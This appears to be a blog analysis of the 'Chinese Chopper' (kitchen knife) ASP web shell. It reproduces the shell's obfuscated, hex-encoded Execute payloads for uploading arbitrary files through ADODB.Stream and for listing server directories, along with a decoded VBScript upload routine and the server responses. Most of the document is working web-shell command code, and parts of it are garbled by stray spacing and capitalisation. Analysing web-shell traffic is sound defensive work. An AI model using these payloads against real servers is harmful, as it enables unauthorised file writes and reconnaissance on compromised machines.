Http://blog.csdn.net/webxscan Dragon
Webxscan=eval ("Execute (" "on+error+resume+next:function+bd%28byval+s%29%3afor+i%3d1+to+len%28s%29+step+2%3ac% 3dmid%28s%2ci%2c2%29%3aif+isnumeric%28mid%28s%2ci%2c1%29%29+then%3aexecute
%28%22%22%22%22bd%3dbd%26chr%28%26h%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3aelse%3aexecute%28%22%22 %22%22bd%3dbd%26chr%28%26h%22%22%22%22%26c%26mid%28s%2ci
%2b2%2c2%29%26%22%22%22%22%29%22%22%22%22%29%3ai%3di%2b2%3aend+if%22%22%26chr%2810%29%26%22%22next%3aend+ Function:Response.Write ("" ""->| "" ""): Execute ("" "" "On+error+resume+next:" "" "%26BD
("" "" "44696d206c2c73732c66662c543a66663d6264287265717565737428227a312229293a73733d5265717565737428227a3222293a6c3d4c656e28 7373293a53657420533d5365727665722e4372656174654f626a656374282241646f
64622e53747265616d22293a5769746820533a2e547970653d313a2e4d6f64653d333a2e4f70656e3a4966205265717565737428227a3322293e30205 468656e3a2e4c6f616446726f6d46696c652022222666662622223a2e506f7369746
96f6e3d2e53697a653a456e642049663a7365742072733d4372656174654f626a656374282241444f44422e5265636f726473657422293a72732e6669 656c64732e617070656e6420226262222c3230352c6c2f323a72732e6f70656e3a72
732e6164646e65773a72732822626222293d73732b636872622830293a72732e7570646174653a2e57726974652072732822626222292e67657463687 56e6b286c2f32293a72732e636c6f73653a5365742072733d4e6f7468696e673a2e5
06f736974696f6e3d303a2e53617665546f46696c652022222666662622222c323a2e436c6f73653a456e6420576974683a53657420533d4e6f746869 6e673a496620457272205468656e3a543d4572722e4465736372697074696f6e3a45
72722e436c6561723a456c73653a543d2231223a456e642049663a526573706f6e73652e5772697465285429 "" ")): Response.Write ( "" "" "|<-" "" "): Response.End" ")"
&z1= 433a5c5c446f63756d656e747320616e642053657474696e67735c5c615c5cd7c0c3e65c5c7777775c5c2e5c5c3132332e747874& Z2=313233343536&z3=0
Dim l,ss,ff,t
FF=BD (Request ("Z1"))
' Z1 upload path C:\\Documents and settings\\a\\xà?? \\www\\.\\123.txt
Ss=request ("Z2")
' Z2 file contents 123456
L=len (SS)
Set s=server.createobject ("ADODB.stream")
With S
. Type=1
. Mode=3
. Open
If Request ("Z3") >0 Then
' What do these 2 lines mean under Z3?
. LoadFromFile "" &ff& ""
. position=. Size
End If
Set Rs=createobject ("ADODB. Recordset ")
Rs.fields.append "BB", 205,L/2
Rs.open:rs.addnew:rs ("BB") =SS+CHRB (0)
Rs.update:. Write rs ("BB"). GetChunk (L/2)
Rs.close
Set rs=nothing
. Position=0
. SaveToFile "" &ff& "", 2
. Close
End with
Set s=nothing
If ERR Then
T=err.description
Err.Clear
Else
t= "1"
End If
Response.Write (T)
->|1|<-
Webxscan=eval ("Execute (" "on+error+resume+next:function+bd%28byval+s%29%3afor+i%3d1+to+len%28s%29+step+2%3ac% 3dmid%28s%2ci%2c2%29%3aif+isnumeric%28mid%28s%2ci%2c1%29%29+then%3aexecute
%28%22%22%22%22bd%3dbd%26chr%28%26h%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3aelse%3aexecute%28%22%22 %22%22bd%3dbd%26chr%28%26h%22%22%22%22%26c%26mid%28s%2ci
%2b2%2c2%29%26%22%22%22%22%29%22%22%22%22%29%3ai%3di%2b2%3aend+if%22%22%26chr%2810%29%26%22%22next%3aend+ Function:Response.Write ("" ""->| "" ""): Execute ("" "" "On+error+resume+next:" "" "%26BD
("" "" "44696d2052523a52523d6264285265717565737428227a312229293a46756e6374696f6e204644286474293a46443d596561722864742926222d 223a4966204c656e284d6f6e746828647429293d31205468656e3a4644203d204644
262230223a456e642049663a46443d4644264d6f6e74682864742926222d223a4966204c656e2844617928647429293d31205468656e3a46443d46442 62230223a456e642049663a46443d464426446179286474292622202226466f726d6
1744461746554696d652864742c342926223a223a4966204c656e285365636f6e6428647429293d31205468656e3a46443d4644262230223a456e6420 49663a46443d4644265365636f6e64286474293a456e642046756e6374696f6e3a53
455420433d4372656174654f626a6563742822536372697074696e672e46696c6553797374656d4f626a65637422293a53657420464f3d432e4765744 66f6c646572282222265252262222293a496620457272205468656e3a526573706f6
e73652e577269746528224552524f523a2f2f2022264572722e4465736372697074696f6e293a4572722e436c6561723a456c73653a466f7220456163 68204620696e20464f2e737562666f6c646572733a526573706f6e73652e57726974
6520462e4e616d6526636872283437292663687228392926464428462e446174654c6173744d6f6469666965642926636872283929266368722834382 92663687228392926432e476574466f6c64657228462e50617468292e61747472696
27574657326636872283130293a4e6578743a466f722045616368204c20696e20464f2e66696c65733a526573706f6e73652e5772697465204c2e4e61 6d6526636872283929264644284c2e446174654c6173744d6f646966696564292663
6872283929264c2e73697a652663687228392926432e47657446696c65284c2e50617468292e6174747269627574657326636872283130293a4e65787 43a456e64204966 "" "): Response.Write (" "" "" "|<-" "" "): Response.End" ")")
&z1=433a5c5c446f63756d656e747320616e642053657474696e67735c5c615c5cd7c0c3e65c5c7777775c5c2e5c5c
->|1121111111/2016-05-06 22:17:08 0 16
bj1/2016-05-06 22:17:09 0 16
css/2016-05-06 22:17:09 0 16
img/2016-05-06 22:17:09 0 16
ip2/2016-05-06
22:17:09 0 16
js/2016-05-06 22:17:09 0 16
thinkphp/2016-05-06 22:17:16 0 16
zz/2016-05-06 22:17:22 0 16
ZZ-Dungeon/2016-05-06 22:17:24
0 16
New Folder/2016-05-06 22:17:25 0 16
. Project 2016-04-05 06:48:00 1143 32
123.txt 2016-05-08 05:47:21 6 32
Asp.asp 2016-04-30 01:08:10
2613 32
Aws.exe 2013-03-22 08:50:42 654164 32
cs.php 2016-04-21 21:02:34 375 32
Eval.asp 2016-05-06 22:13:14 28 32
eval.php 2016-04-06 12:13:02
34 32
Index.html 2016-04-05 06:48:00 123 32
Web.sql 2016-04-10 22:38:32 25050 32
Www.rar 2014-07-16 23:38:40 17318435 32
Zz.rar 2014-07-16
22:49:38 3573855 32
|<-
kitchen Knife ASP Upload file response